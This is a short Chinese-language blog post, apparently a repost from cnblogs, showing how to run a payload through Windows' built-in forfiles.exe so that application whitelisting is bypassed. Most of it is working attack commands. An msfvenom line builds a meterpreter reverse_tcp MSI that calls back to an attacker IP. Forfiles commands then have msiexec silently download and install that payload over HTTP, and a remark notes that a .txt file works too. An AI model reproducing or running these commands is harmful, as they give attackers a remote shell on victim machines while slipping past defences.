• 白名单执行payload之Forfiles

    简介

    Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用

已添加环境变量,路径如下:
C:WindowsSystem32forfiles.exe
C:WindowsSysWOW64forfiles.exe

    实际使用

    设定监听如下:


    此处依旧使用msi的payload即可
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.122.1 lport=2021 -f msi > 2021.msi
目标终端执行如下:
forfiles /p c:windowssystem32 /m cmd.exe /c  "msiexec.exe /q /i http://192.168.122.1/2021.msi"


    此处txt也是可以上线的!
forfiles /p c:windowssystem32 /m cmd.exe /c  "msiexec.exe /q /i http://192.168.122.1/2021.txt

    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 相关阅读:
    Oracle,第六周
    JAVA创建对象的几种方式
    深拷贝和浅拷贝
    Facade
    Adapter
    低谷过去了
    Oracle,第五周
    Command
    Singleton
    mybatis自动生成mapping和实体
  • 原文地址:https://www.cnblogs.com/Yang34/p/14407791.html
Copyright © 2020-2023  润新知